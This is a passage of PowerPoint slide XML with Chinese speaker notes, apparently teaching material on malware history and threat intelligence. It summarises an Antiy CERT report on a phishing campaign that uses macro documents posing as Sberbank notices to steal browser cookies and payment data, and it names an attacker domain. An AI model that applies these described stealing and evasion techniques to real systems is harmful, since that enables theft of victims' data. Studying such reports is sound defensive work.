      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381467014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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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208</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82379460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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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209</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39198256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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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210</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1818571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安天科技“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>从反恶意代码到对抗高级威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://mp.weixin.qq.com/s/C30LYAXfyNJovB-hNllCiQ</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b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年在信息技术发展是一个特殊的时点，个人计算机革命的高潮与信息高速公路的兴起叠加激荡。单机操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>全面退场，全面支持网络通信的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Windows 9x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>操作系统的广泛使用；</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Windows NT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>也在全面蚕食着传统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的市场，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务、电子邮件服务，从象牙塔中的奢侈品，变成普通用户获取和交换信息的方式。这种变化在带来巨大革命变革的同时，计算机恶意代码也借此大规模流行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体"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effectLst/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>时代，感染式病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>）、蠕虫（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>）和特洛伊木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>），都是相对窄带而互斥的技术概念。从形态上看，感染式病毒是一个代码片断，需要感染宿主程序或磁盘引导记录，蠕虫是不感染宿主程序而传播自身的独立程序，木马则是指预设恶意逻辑但不具备传播能力的程序。在此时期，磁盘是数据交换的主要方式，感染式病毒从种类和数量来看，都居于主流地位。这一情况随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Win9x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>系统兴起发生了巨变：恶意代码编写者的想象力突破了程序宿主空间的限制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Happy99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>蠕虫利用劫持电子邮件的方式传播并快速流行，拉开了蠕虫时代大幕；代号“死牛祭礼”（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Cult of the Dead Cow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>）的黑客组织发布了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Back Orifice 2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>木马（简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>BO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>）并将其开源，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>BO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>随即成为国内划时代的网络攻击工具，并从此激活了特洛伊木马中最为庞大的分支</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>——RAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Remote Access Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>，远程控制木马）。在此后的恶意代码演进中，感染式病毒日渐式微，蠕虫成为主流威胁类型并延续</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>5~8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>年时间。其后，特洛伊木马数量在利益驱动的模式下开始呈几何级数增长。此时，“病毒”从狭义的感染式病毒概念已经转化为对各种恶意程序的统称，并被媒体所广泛使用，但在学术文献中，则以恶意代码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Malicious code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>）概念来表示上述各种威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E46A9642-FD4A-45CC-9F4F-8E10AB9AB4AA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276734998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https://www.secrss.com/articles/30531</a:t>
            </a:r>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211</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16194027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0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>近日，安天</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CERT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>监测到一起乌克兰针对俄罗斯的窃密行动，该起攻击行动在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>（战术、技术</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>程序）中以多种方式对抗杀毒软件和防火墙设备等安全设备。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>本次行动中攻击手法简单，载荷尚未成熟，注册域名数量较少，并且夜莺是乌克兰的标志性动物之一，因此安天将这次攻击活动命名为“雏莺行动”。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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该起攻击行动主要通过钓鱼邮件进行传播，将邮件伪装为俄罗斯联邦储蓄银行（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Sberbank</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）官方通知，诱导受害者下载附件中的带有宏的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文档，并诱使受害者执行恶意宏代码。一旦文档中的恶意宏被执行，会在多层下载解码后运行此次攻击行动的有效载荷，对除乌克兰以外国家的设备进行攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>该样本会窃取浏览器的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、登录信息和支付信息回传给攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Telegram</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务器，造成受害者财产损失和机密信息泄露。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>此次行动，攻击者将窃密功能隐藏在最终的载荷里并且在内存中加载一段</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>与远程服务器保持通信，窃密载荷一旦发现目标系统有沙箱系统、调试行为，以及目标系统属于乌克兰的设备，便立即自删除。通过对该起行动时间、域名（攻击者使用的域名为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>usamyforever.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，译为“我永远的美国”）等背景关联，推测是乌克兰针对俄罗斯的一起窃密行动。</a:t>
            </a:r>
          </a:p>
          <a:p>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212</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119298184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0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>样本如果满足反分析中的任一条件，或受害者国家为乌克兰，则会释放一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>bat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件到临时目录，该</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>bat</a:t>
            </a:r>
            <a:r>
